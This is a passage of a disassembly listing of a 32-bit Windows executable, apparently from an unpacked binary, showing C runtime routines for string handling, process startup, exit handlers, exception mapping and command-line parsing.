sub_4026F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402770 proc near ; CODE XREF: sub_401B59+103�p
; sub_401B59+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402789: ; CODE XREF: sub_402770+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402789
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4027B1
mov edx, ds:dword_4070CC
loc_4027B1: ; CODE XREF: sub_402770+39�j
; sub_402770+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4027D1
test al, al
jz short loc_4027D1
inc edx
jmp short loc_4027B1
; ---------------------------------------------------------------------------
loc_4027D1: ; CODE XREF: sub_402770+58�j
; sub_402770+5C�j
mov ebx, edx
loc_4027D3: ; CODE XREF: sub_402770+81�j
mov al, [edx]
test al, al
jz short loc_4027F7
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_4027F3
inc edx
jmp short loc_4027D3
; ---------------------------------------------------------------------------
loc_4027F3: ; CODE XREF: sub_402770+7E�j
and byte ptr [edx], 0
inc edx
loc_4027F7: ; CODE XREF: sub_402770+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov ds:dword_4070CC, edx
and eax, ebx
pop ebx
leave
retn
sub_402770 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402810 proc near ; CODE XREF: sub_401B59+E9�p
; sub_401B59+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402881
sub_402810 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402820 proc near ; CODE XREF: sub_401F4B+15D�p
; sub_401F4B+16C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_40283C
loc_40282D: ; CODE XREF: sub_402820+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40286F
test ecx, 3
jnz short loc_40282D
loc_40283C: ; CODE XREF: sub_402820+B�j
; sub_402820+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40283C
mov eax, [ecx-4]
test al, al
jz short loc_40287E
test ah, ah
jz short loc_402879
test eax, 0FF0000h
jz short loc_402874
test eax, 0FF000000h
jz short loc_40286F
jmp short loc_40283C
; ---------------------------------------------------------------------------
loc_40286F: ; CODE XREF: sub_402820+12�j
; sub_402820+4B�j
lea edi, [ecx-1]
jmp short loc_402881
; ---------------------------------------------------------------------------
loc_402874: ; CODE XREF: sub_402820+44�j
lea edi, [ecx-2]
jmp short loc_402881
; ---------------------------------------------------------------------------
loc_402879: ; CODE XREF: sub_402820+3D�j
lea edi, [ecx-3]
jmp short loc_402881
; ---------------------------------------------------------------------------
loc_40287E: ; CODE XREF: sub_402820+39�j
lea edi, [ecx-4]
loc_402881: ; CODE XREF: sub_402810+5�j
; sub_402820+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_4028A6
loc_40288D: ; CODE XREF: sub_402820+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_4028F8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40288D
jmp short loc_4028A6
; ---------------------------------------------------------------------------
loc_4028A1: ; CODE XREF: sub_402820+9E�j
; sub_402820+B8�j
mov [edi], edx
add edi, 4
loc_4028A6: ; CODE XREF: sub_402820+6B�j
; sub_402820+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_4028A1
test dl, dl
jz short loc_4028F8
test dh, dh
jz short loc_4028EF
test edx, 0FF0000h
jz short loc_4028E2
test edx, 0FF000000h
jz short loc_4028DA
jmp short loc_4028A1
; ---------------------------------------------------------------------------
loc_4028DA: ; CODE XREF: sub_402820+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4028E2: ; CODE XREF: sub_402820+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4028EF: ; CODE XREF: sub_402820+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4028F8: ; CODE XREF: sub_402820+72�j
; sub_402820+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_402820 endp
; =============== S U B R O U T I N E =======================================
sub_402900 proc near ; CODE XREF: sub_401E8B+19�p
arg_0 = dword ptr 4
cmp ds:dword_406E7C, 1
jle short loc_40291A
push 107h
push [esp+4+arg_0]
call sub_402B3C
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40291A: ; CODE XREF: sub_402900+7�j
mov eax, [esp+arg_0]
mov ecx, ds:off_406C70
mov ax, [ecx+eax*2]
and eax, 107h
retn
sub_402900 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40292E proc near ; CODE XREF: start+7�j
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405150
push offset sub_4035A8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call ds:dword_4050D4 ; GetVersion
xor edx, edx
mov dl, ah
mov ds:dword_4070F4, edx
mov ecx, eax
and ecx, 0FFh
mov ds:dword_4070F0, ecx
shl ecx, 8
add ecx, edx
mov ds:dword_4070EC, ecx
shr eax, 10h
mov ds:dword_4070E8, eax
xor esi, esi
push esi
call sub_403472
pop ecx
test eax, eax
jnz short loc_40299A
push 1Ch
call sub_402A49
pop ecx
loc_40299A: ; CODE XREF: sub_40292E+62�j
mov [ebp+var_4], esi
call sub_4032C7
call ds:dword_4050D0 ; GetCommandLineA
mov ds:dword_4075F8, eax
call sub_403195
mov ds:dword_4070D0, eax
call sub_402F48
call sub_402E8F
call sub_402BB1
mov [ebp+var_30], esi
lea eax, [ebp+var_5C]
push eax
call ds:dword_4050CC ; GetStartupInfoA
call sub_402E37
mov [ebp+var_64], eax
test byte ptr [ebp+var_30], 1
jz short loc_4029E7
movzx eax, [ebp+var_2C]
jmp short loc_4029EA
; ---------------------------------------------------------------------------
loc_4029E7: ; CODE XREF: sub_40292E+B1�j
push 0Ah
pop eax
loc_4029EA: ; CODE XREF: sub_40292E+B7�j
push eax
push [ebp+var_64]
push esi
push esi
call ds:dword_4050C8 ; GetModuleHandleA
push eax
call sub_4020D9
mov [ebp+var_60], eax
push eax
call sub_402BDE
mov eax, [ebp+var_14]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp+var_68], ecx
push eax
push ecx
call sub_402CB3
pop ecx
pop ecx
retn
sub_40292E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_402BEF
; =============== S U B R O U T I N E =======================================
sub_402A24 proc near ; CODE XREF: sub_402E8F+4E�p
; sub_402E8F+7D�p ...
arg_0 = dword ptr 4
cmp ds:dword_4070D8, 1
jnz short loc_402A32
call sub_403680
loc_402A32: ; CODE XREF: sub_402A24+7�j
push [esp+arg_0]
call sub_4036B9
push 0FFh
call ds:off_406C60
pop ecx
pop ecx
retn
sub_402A24 endp
; =============== S U B R O U T I N E =======================================
sub_402A49 proc near ; CODE XREF: sub_40292E+66�p
arg_0 = dword ptr 4
cmp ds:dword_4070D8, 1
jnz short loc_402A57
call sub_403680
loc_402A57: ; CODE XREF: sub_402A49+7�j
push [esp+arg_0]
call sub_4036B9
pop ecx
push 0FFh
call ds:dword_4050D8 ; ExitProcess
retn
sub_402A49 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402A86
loc_402A70: ; CODE XREF: sub_402A86+17�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_402A86
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
; =============== S U B R O U T I N E =======================================
sub_402A86 proc near ; CODE XREF: sub_4026F0+6E�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00402A70 SIZE 00000005 BYTES
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_402AAB
loc_402A98: ; CODE XREF: sub_402A86+23�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_402A70
test cl, cl
jz short loc_402AF4
test edx, 3
jnz short loc_402A98
loc_402AAB: ; CODE XREF: sub_402A86+10�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_402AB6: ; CODE XREF: sub_402A86+5B�j
; sub_402A86+6A�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_402AF8
and eax, 81010100h
jz short loc_402AB6
and eax, 1010100h
jnz short loc_402AF2
and esi, 80000000h
jnz short loc_402AB6
loc_402AF2: ; CODE XREF: sub_402A86+62�j
; sub_402A86+7B�j ...
pop esi
pop edi
loc_402AF4: ; CODE XREF: sub_402A86+1B�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402AF8: ; CODE XREF: sub_402A86+54�j
mov eax, [edx-4]
cmp al, bl
jz short loc_402B35
test al, al
jz short loc_402AF2
cmp ah, bl
jz short loc_402B2E
test ah, ah
jz short loc_402AF2
shr eax, 10h
cmp al, bl
jz short loc_402B27
test al, al
jz short loc_402AF2
cmp ah, bl
jz short loc_402B20
test ah, ah
jz short loc_402AF2
jmp short loc_402AB6
; ---------------------------------------------------------------------------
loc_402B20: ; CODE XREF: sub_402A86+92�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402B27: ; CODE XREF: sub_402A86+8A�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402B2E: ; CODE XREF: sub_402A86+7F�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402B35: ; CODE XREF: sub_402A86+77�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_402A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B3C proc near ; CODE XREF: sub_402900+12�p
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_402B5A
mov ecx, ds:off_406C70
movzx eax, word ptr [ecx+eax*2]
jmp short loc_402BAC
; ---------------------------------------------------------------------------
loc_402B5A: ; CODE XREF: sub_402B3C+10�j
mov ecx, eax
push esi
mov esi, ds:off_406C70
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_402B7F
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_402B88
; ---------------------------------------------------------------------------
loc_402B7F: ; CODE XREF: sub_402B3C+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_402B88: ; CODE XREF: sub_402B3C+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_40380C
add esp, 1Ch
test eax, eax
jnz short loc_402BA8
leave
retn
; ---------------------------------------------------------------------------
loc_402BA8: ; CODE XREF: sub_402B3C+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_402BAC: ; CODE XREF: sub_402B3C+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_402B3C endp
; =============== S U B R O U T I N E =======================================
sub_402BB1 proc near ; CODE XREF: sub_40292E+93�p
mov eax, ds:dword_4075F4
test eax, eax
jz short loc_402BBC
call eax
loc_402BBC: ; CODE XREF: sub_402BB1+7�j
push offset dword_406010
push offset dword_406008
call sub_402C99
push offset dword_406004
push offset dword_406000
call sub_402C99
add esp, 10h
retn
sub_402BB1 endp
; =============== S U B R O U T I N E =======================================
sub_402BDE proc near ; CODE XREF: sub_40292E+D2�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_402C00
add esp, 0Ch
retn
sub_402BDE endp
; =============== S U B R O U T I N E =======================================
sub_402BEF proc near ; CODE XREF: .text:00402A1F�p
; sub_402A24+1C�p
; DATA XREF: ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_402C00
add esp, 0Ch
retn
sub_402BEF endp
; =============== S U B R O U T I N E =======================================
sub_402C00 proc near ; CODE XREF: sub_402BDE+8�p
; sub_402BEF+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp ds:dword_407124, edi
jnz short loc_402C1D
push [esp+4+arg_0]
call ds:dword_4050E0 ; GetCurrentProcess
push eax
call ds:dword_4050DC ; TerminateProcess
loc_402C1D: ; CODE XREF: sub_402C00+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov ds:dword_407120, edi
mov ds:byte_40711C, bl
jnz short loc_402C71
mov eax, ds:dword_4075F0
test eax, eax
jz short loc_402C60
mov ecx, ds:dword_4075EC
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_402C5F
loc_402C4C: ; CODE XREF: sub_402C00+5D�j
mov eax, [esi]
test eax, eax
jz short loc_402C54
call eax
loc_402C54: ; CODE XREF: sub_402C00+50�j
sub esi, 4
cmp esi, ds:dword_4075F0
jnb short loc_402C4C
loc_402C5F: ; CODE XREF: sub_402C00+4A�j
pop esi
loc_402C60: ; CODE XREF: sub_402C00+3C�j
push offset dword_406018
push offset dword_406014
call sub_402C99
pop ecx
pop ecx
loc_402C71: ; CODE XREF: sub_402C00+33�j
push offset dword_406020
push offset dword_40601C
call sub_402C99
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_402C97
push [esp+4+arg_0]
mov ds:dword_407124, edi
call ds:dword_4050D8 ; ExitProcess
loc_402C97: ; CODE XREF: sub_402C00+85�j
pop edi
retn
sub_402C00 endp
; =============== S U B R O U T I N E =======================================
sub_402C99 proc near ; CODE XREF: sub_402BB1+15�p
; sub_402BB1+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402C9E: ; CODE XREF: sub_402C99+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402CB1
mov eax, [esi]
test eax, eax
jz short loc_402CAC
call eax
loc_402CAC: ; CODE XREF: sub_402C99+F�j
add esi, 4
jmp short loc_402C9E
; ---------------------------------------------------------------------------
loc_402CB1: ; CODE XREF: sub_402C99+9�j
pop esi
retn
sub_402C99 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CB3 proc near ; CODE XREF: sub_40292E+E3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_402DF4
test eax, eax
pop ecx
jz loc_402DE8
mov ebx, [eax+8]
test ebx, ebx
jz loc_402DE8
cmp ebx, 5
jnz short loc_402CE4
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_402DF1
; ---------------------------------------------------------------------------
loc_402CE4: ; CODE XREF: sub_402CB3+23�j
cmp ebx, 1
jz loc_402DE3
mov ecx, ds:dword_407128
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov ds:dword_407128, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_402DD3
mov ecx, ds:dword_406F00
mov edx, ds:dword_406F04
add edx, ecx
push esi
cmp ecx, edx
jge short loc_402D33
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:406E90h[esi*4]
loc_402D2A: ; CODE XREF: sub_402CB3+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_402D2A
loc_402D33: ; CODE XREF: sub_402CB3+69�j
mov eax, [eax]
mov esi, ds:dword_406F0C
cmp eax, 0C000008Eh
jnz short loc_402D4E
mov ds:dword_406F0C, 83h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D4E: ; CODE XREF: sub_402CB3+8D�j
cmp eax, 0C0000090h
jnz short loc_402D61
mov ds:dword_406F0C, 81h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D61: ; CODE XREF: sub_402CB3+A0�j
cmp eax, 0C0000091h
jnz short loc_402D74
mov ds:dword_406F0C, 84h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D74: ; CODE XREF: sub_402CB3+B3�j
cmp eax, 0C0000093h
jnz short loc_402D87
mov ds:dword_406F0C, 85h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D87: ; CODE XREF: sub_402CB3+C6�j
cmp eax, 0C000008Dh
jnz short loc_402D9A
mov ds:dword_406F0C, 82h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D9A: ; CODE XREF: sub_402CB3+D9�j
cmp eax, 0C000008Fh
jnz short loc_402DAD
mov ds:dword_406F0C, 86h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402DAD: ; CODE XREF: sub_402CB3+EC�j
cmp eax, 0C0000092h
jnz short loc_402DBE
mov ds:dword_406F0C, 8Ah
loc_402DBE: ; CODE XREF: sub_402CB3+99�j
; sub_402CB3+AC�j ...
push ds:dword_406F0C
push 8
call ebx ; _hread
pop ecx
mov ds:dword_406F0C, esi
pop ecx
pop esi
jmp short loc_402DDB
; ---------------------------------------------------------------------------
loc_402DD3: ; CODE XREF: sub_402CB3+52�j
and dword ptr [eax+8], 0
push ecx
call ebx ; _hread
pop ecx
loc_402DDB: ; CODE XREF: sub_402CB3+11E�j
mov eax, [ebp+arg_0]
mov ds:dword_407128, eax
loc_402DE3: ; CODE XREF: sub_402CB3+34�j
or eax, 0FFFFFFFFh
jmp short loc_402DF1
; ---------------------------------------------------------------------------
loc_402DE8: ; CODE XREF: sub_402CB3+F�j
; sub_402CB3+1A�j
push [ebp+arg_4]
call ds:dword_4050E4 ; UnhandledExceptionFilter
loc_402DF1: ; CODE XREF: sub_402CB3+2C�j
; sub_402CB3+133�j
pop ebx
pop ebp
retn
sub_402CB3 endp
; =============== S U B R O U T I N E =======================================
sub_402DF4 proc near ; CODE XREF: sub_402CB3+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, ds:dword_406F08
cmp ds:dword_406E88, edx
push esi
mov eax, offset dword_406E88
jz short loc_402E21
lea esi, [ecx+ecx*2]
lea esi, ds:406E88h[esi*4]
loc_402E16: ; CODE XREF: sub_402DF4+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_402E21
cmp [eax], edx
jnz short loc_402E16
loc_402E21: ; CODE XREF: sub_402DF4+16�j
; sub_402DF4+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:406E88h[ecx*4]
cmp eax, ecx
jnb short loc_402E34
cmp [eax], edx
jz short locret_402E36
loc_402E34: ; CODE XREF: sub_402DF4+3A�j
xor eax, eax
locret_402E36: ; CODE XREF: sub_402DF4+3E�j
retn
sub_402DF4 endp
; =============== S U B R O U T I N E =======================================
sub_402E37 proc near ; CODE XREF: sub_40292E+A5�p
cmp ds:dword_4075E8, 0
jnz short loc_402E45
call sub_403D5B
loc_402E45: ; CODE XREF: sub_402E37+7�j
push esi
mov esi, ds:dword_4075F8
mov al, [esi]
cmp al, 22h
jnz short loc_402E77
loc_402E52: ; CODE XREF: sub_402E37+33�j
; sub_402E37+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_402E6F
test al, al
jz short loc_402E6F
movzx eax, al
push eax
call sub_403955
test eax, eax
pop ecx
jz short loc_402E52
inc esi
jmp short loc_402E52
; ---------------------------------------------------------------------------
loc_402E6F: ; CODE XREF: sub_402E37+21�j
; sub_402E37+25�j
cmp byte ptr [esi], 22h
jnz short loc_402E81
loc_402E74: ; CODE XREF: sub_402E37+52�j
inc esi
jmp short loc_402E81
; ---------------------------------------------------------------------------
loc_402E77: ; CODE XREF: sub_402E37+19�j
cmp al, 20h
jbe short loc_402E81
loc_402E7B: ; CODE XREF: sub_402E37+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_402E7B
loc_402E81: ; CODE XREF: sub_402E37+3B�j
; sub_402E37+3E�j ...
mov al, [esi]
test al, al
jz short loc_402E8B
cmp al, 20h
jbe short loc_402E74
loc_402E8B: ; CODE XREF: sub_402E37+4E�j
mov eax, esi
pop esi
retn
sub_402E37 endp
; =============== S U B R O U T I N E =======================================
sub_402E8F proc near ; CODE XREF: sub_40292E+8E�p
push ebx
xor ebx, ebx
cmp ds:dword_4075E8, ebx
push esi
push edi
jnz short loc_402EA1
call sub_403D5B
loc_402EA1: ; CODE XREF: sub_402E8F+B�j
mov esi, ds:dword_4070D0
xor edi, edi
loc_402EA9: ; CODE XREF: sub_402E8F+30�j
mov al, [esi]
cmp al, bl
jz short loc_402EC1
cmp al, 3Dh
jz short loc_402EB4
inc edi
loc_402EB4: ; CODE XREF: sub_402E8F+22�j
push esi
call sub_402300
pop ecx
lea esi, [esi+eax+1]
jmp short loc_402EA9
; ---------------------------------------------------------------------------
loc_402EC1: ; CODE XREF: sub_402E8F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_403DA6
mov esi, eax
pop ecx
cmp esi, ebx
mov ds:dword_407104, esi
jnz short loc_402EE3
push 9
call sub_402A24
pop ecx
loc_402EE3: ; CODE XREF: sub_402E8F+4A�j
mov edi, ds:dword_4070D0
cmp [edi], bl
jz short loc_402F26
push ebp
loc_402EEE: ; CODE XREF: sub_402E8F+94�j
push edi
call sub_402300
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_402F1F
push ebp
call sub_403DA6
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_402F12
push 9
call sub_402A24
pop ecx
loc_402F12: ; CODE XREF: sub_402E8F+79�j
push edi
push dword ptr [esi]
call sub_402810
pop ecx
add esi, 4
pop ecx
loc_402F1F: ; CODE XREF: sub_402E8F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_402EEE
pop ebp
loc_402F26: ; CODE XREF: sub_402E8F+5C�j
push ds:dword_4070D0
call sub_403D77
pop ecx
mov ds:dword_4070D0, ebx
mov [esi], ebx
pop edi
pop esi
mov ds:dword_4075E4, 1
pop ebx
retn
sub_402E8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F48 proc near ; CODE XREF: sub_40292E+89�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp ds:dword_4075E8, ebx
push esi
push edi
jnz short loc_402F5F
call sub_403D5B
loc_402F5F: ; CODE XREF: sub_402F48+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call ds:dword_405038 ; GetModuleFileNameA
mov eax, ds:dword_4075F8
mov ds:off_407114, esi
mov edi, esi
cmp [eax], bl
jz short loc_402F84
mov edi, eax
loc_402F84: ; CODE XREF: sub_402F48+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_402FE1
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_403DA6
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_402FB4
push 8
call sub_402A24
pop ecx
loc_402FB4: ; CODE XREF: sub_402F48+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_402FE1
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov ds:dword_4070FC, esi
pop edi
pop esi
mov ds:dword_4070F8, eax
pop ebx
leave
retn
sub_402F48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402FE1 proc near ; CODE XREF: sub_402F48+47�p
; sub_402F48+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_40300B
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_40300B: ; CODE XREF: sub_402FE1+20�j
cmp byte ptr [eax], 22h
jnz short loc_403054
loc_403010: ; CODE XREF: sub_402FE1+58�j
; sub_402FE1+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_403042
test dl, dl
jz short loc_403042
movzx edx, dl
test ds:byte_4073C1[edx], 4
jz short loc_403035
inc dword ptr [ecx]
test esi, esi
jz short loc_403035
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_403035: ; CODE XREF: sub_402FE1+46�j
; sub_402FE1+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_403010
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_403010
; ---------------------------------------------------------------------------
loc_403042: ; CODE XREF: sub_402FE1+36�j
; sub_402FE1+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_40304C
and byte ptr [esi], 0
inc esi
loc_40304C: ; CODE XREF: sub_402FE1+65�j
cmp byte ptr [eax], 22h
jnz short loc_403097
inc eax
jmp short loc_403097
; ---------------------------------------------------------------------------
loc_403054: ; CODE XREF: sub_402FE1+2D�j
; sub_402FE1+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_40305F
mov dl, [eax]
mov [esi], dl
inc esi
loc_40305F: ; CODE XREF: sub_402FE1+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test ds:byte_4073C1[ebx], 4
jz short loc_40307A
inc dword ptr [ecx]
test esi, esi
jz short loc_403079
mov bl, [eax]
mov [esi], bl
inc esi
loc_403079: ; CODE XREF: sub_402FE1+91�j
inc eax
loc_40307A: ; CODE XREF: sub_402FE1+8B�j
cmp dl, 20h
jz short loc_403088
test dl, dl
jz short loc_40308C
cmp dl, 9
jnz short loc_403054
loc_403088: ; CODE XREF: sub_402FE1+9C�j
test dl, dl
jnz short loc_40308F
loc_40308C: ; CODE XREF: sub_402FE1+A0�j
dec eax
jmp short loc_403097
; ---------------------------------------------------------------------------
loc_40308F: ; CODE XREF: sub_402FE1+A9�j
test esi, esi
jz short loc_403097
and byte ptr [esi-1], 0
loc_403097: ; CODE XREF: sub_402FE1+6E�j
; sub_402FE1+71�j ...
and [ebp+arg_10], 0
loc_40309B: ; CODE XREF: sub_402FE1+19E�j
cmp byte ptr [eax], 0
jz loc_403184
loc_4030A4: ; CODE XREF: sub_402FE1+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_4030B0
cmp dl, 9
jnz short loc_4030B3
loc_4030B0: ; CODE XREF: sub_402FE1+C8�j
inc eax
jmp short loc_4030A4
; ---------------------------------------------------------------------------
loc_4030B3: ; CODE XREF: sub_402FE1+CD�j
cmp byte ptr [eax], 0
jz loc_403184
test edi, edi
jz short loc_4030C8
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_4030C8: ; CODE XREF: sub_402FE1+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_4030CD: ; CODE XREF: sub_402FE1+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_4030D6: ; CODE XREF: sub_402FE1+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_4030DF
inc eax
inc ebx
jmp short loc_4030D6
; ---------------------------------------------------------------------------
loc_4030DF: ; CODE XREF: sub_402FE1+F8�j
cmp byte ptr [eax], 22h
jnz short loc_403110
test bl, 1
jnz short loc_40310E
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_4030FD
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_4030FD
mov eax, edx
jmp short loc_403100
; ---------------------------------------------------------------------------
loc_4030FD: ; CODE XREF: sub_402FE1+10D�j
; sub_402FE1+116�j
mov [ebp+arg_0], edi
